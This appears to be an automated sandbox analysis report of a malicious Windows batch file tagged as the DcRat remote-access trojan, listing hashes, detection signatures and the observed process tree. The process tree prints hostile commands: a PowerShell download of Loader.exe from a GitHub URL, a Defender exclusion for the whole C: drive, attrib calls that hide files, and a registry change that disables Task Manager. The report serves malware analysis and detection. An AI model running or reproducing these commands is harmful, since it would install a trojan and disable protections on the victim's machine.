Analysis

  • max time kernel
    31s
  • max time network
    34s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240611-en
  • resource tags

    arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    17-06-2024 11:06

General

  • Target

    Start.bat

  • Size

    2KB

  • MD5

    256c64348b3f43b571e91667ac1a1e36

  • SHA1

    6cd440a5e6a9a5ba70102635a94d0433049afb00

  • SHA256

    3ea1536d0ef8354708bf8f81e540e2e69a20bea0ccfabf3c9d36cc99c07192d7

  • SHA512

    77d9c2ebff2d65e24282443f2ce708deedc1a11e62478c794279e933a1a54982a44cd8dea803d8c41166059d9e57b7c6b0e37c714acc72e7c6ca49196d7201e0

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • DCRat payload 3 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Disables Task Manager via registry modification
  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Start.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4736
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -window hidden -command ""
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3708
    • C:\Windows\system32\cacls.exe
      "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
      2⤵
        PID:1196
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -command "Add-MpPreference -ExclusionPath "C:\
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2976
      • C:\Windows\system32\attrib.exe
        attrib +h "GoogleDrives" /s /d
        2⤵
        • Views/modifies file attributes
        PID:1524
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://github.com/EzKaProject/Loaders/raw/main/Loader.exe' -OutFile Loader.exe"
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1364
      • C:\Windows\system32\attrib.exe
        attrib +h "Loader.exe" /s /d
        2⤵
        • Views/modifies file attributes
        PID:2732
      • C:\Users\Admin\AppData\Local\GoogleDrives\Loader.exe
        Loader.exe
        2⤵
        • Executes dropped EXE
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:412
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\reviewruntimeperfsvc\ewm9etKbRI.vbe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2960
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\reviewruntimeperfsvc\I6Mb37.bat" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:224
            • C:\Users\Admin\AppData\Roaming\reviewruntimeperfsvc\Websaves.exe
              "C:\Users\Admin\AppData\Roaming\reviewruntimeperfsvc\Websaves.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:3388
            • C:\Windows\SysWOW64\reg.exe
              reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
              5⤵
              • Modifies registry key
              PID:1268
      • C:\Windows\system32\attrib.exe
        attrib +h "C:\Users\Admin\AppData\Local\GoogleDrives\Loader.exe" /s /d
        2⤵
        • Views/modifies file attributes
        PID:4248

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\GoogleDrives\Loader.exe

      Filesize

      2.0MB

      MD5

      45d13fd3e101e33acbf271e0537de18f

      SHA1

      458e41068922768361650fb05e7d767e7676becf

      SHA256

      5198ac4261ef383b871b095d7d8ddb16738675d4186dd3a39cb7667e48533a51

      SHA512

      bdf188380d77538bf463c1e854a0e2046249278bd25fb081115043e54ddb5e2df19bae971e9c2701329de9d932d3a897265363861a406f9caeb933c27020837e

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      627073ee3ca9676911bee35548eff2b8

      SHA1

      4c4b68c65e2cab9864b51167d710aa29ebdcff2e

      SHA256

      85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

      SHA512

      3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      64B

      MD5

      d8b9a260789a22d72263ef3bb119108c

      SHA1

      376a9bd48726f422679f2cd65003442c0b6f6dd5

      SHA256

      d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

      SHA512

      550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      b698e32d0304217b19b5d9bdb54dc695

      SHA1

      d839a6bae60d3e4ce89bba63577cfac0f01525eb

      SHA256

      7ba7436fa154eb729d321d2b5e4ee44cebb6a8ecb864798a444909bd80b4cf12

      SHA512

      de05eb79e082a59a442efd0181205619468a27f1ed24c4027b01bfeba2e3f1cd426441f3371a3393d645b2fcf8b6255c1f4d9ed343b6c106ffdf19466c3007e6

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_itp11ism.3bx.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\reviewruntimeperfsvc\I6Mb37.bat

      Filesize

      157B

      MD5

      3fc845936177bf46cc9cb858e256b08d

      SHA1

      ba502e666415cc3228ef61ae0be2564d6a01e4c2

      SHA256

      c2319812c733ab383ddaa29bfb68594f4c5b10dbfdc9192766962ebe5a4baece

      SHA512

      5e847379381516045d68a9275cb0f71cfe207ead9343371949b9c03ed73e2a6b265612ddfdd14549bb546716dda6d2184e97aea21747f0f7fede4df5ddd11d86

    • C:\Users\Admin\AppData\Roaming\reviewruntimeperfsvc\Websaves.exe

      Filesize

      1.7MB

      MD5

      f74442723cdb0a6e567316fe8778125e

      SHA1

      7c1ff5d71f73ca1eee0593d4c3d8d630ecd58b33

      SHA256

      785c55be43d387e65634c031b3a7184d8d008473ae4144c8e427ceada2e4c991

      SHA512

      d3968c33a0444a9204bddfba2b9dd5302160e2a90c4aa0458b41cbf67530ce96f37007ab8ac87d90889828c72c16c1ec4498a749ab04af1940a3ae054bb300af

    • C:\Users\Admin\AppData\Roaming\reviewruntimeperfsvc\ewm9etKbRI.vbe

      Filesize

      207B

      MD5

      be8c2a530a96e0cceae0cdc34bf34287

      SHA1

      dbf3fddc7445a46dab5f3f514fd834597dd0a23f

      SHA256

      4a48e7f5facfc14a7e9a0fbd6715dab969e4a36913b7f757875f2657707a2c38

      SHA512

      6508dfc80702fb2b639d7e8b52509a45415009f0784537149e1cee1b95b8d65bb3de5d0e401d0a6b4832cfd4a4061a71d057a7bbdb67f161a29afc8d7d0c06e7

    • memory/2976-17-0x00007FF880480000-0x00007FF880F42000-memory.dmp

      Filesize

      10.8MB

    • memory/2976-28-0x00007FF880480000-0x00007FF880F42000-memory.dmp

      Filesize

      10.8MB

    • memory/2976-29-0x00007FF880480000-0x00007FF880F42000-memory.dmp

      Filesize

      10.8MB

    • memory/2976-30-0x00007FF880480000-0x00007FF880F42000-memory.dmp

      Filesize

      10.8MB

    • memory/2976-32-0x00007FF880480000-0x00007FF880F42000-memory.dmp

      Filesize

      10.8MB

    • memory/2976-18-0x00007FF880480000-0x00007FF880F42000-memory.dmp

      Filesize

      10.8MB

    • memory/3388-58-0x0000000000E80000-0x000000000103A000-memory.dmp

      Filesize

      1.7MB

    • memory/3388-60-0x0000000001770000-0x000000000177E000-memory.dmp

      Filesize

      56KB

    • memory/3388-59-0x0000000001760000-0x000000000176E000-memory.dmp

      Filesize

      56KB

    • memory/3708-0-0x00007FF880483000-0x00007FF880485000-memory.dmp

      Filesize

      8KB

    • memory/3708-15-0x00007FF880480000-0x00007FF880F42000-memory.dmp

      Filesize

      10.8MB

    • memory/3708-12-0x00007FF880480000-0x00007FF880F42000-memory.dmp

      Filesize

      10.8MB

    • memory/3708-10-0x00007FF880480000-0x00007FF880F42000-memory.dmp

      Filesize

      10.8MB

    • memory/3708-11-0x00007FF880480000-0x00007FF880F42000-memory.dmp

      Filesize

      10.8MB

    • memory/3708-9-0x000001807FEF0000-0x000001807FF12000-memory.dmp

      Filesize

      136KB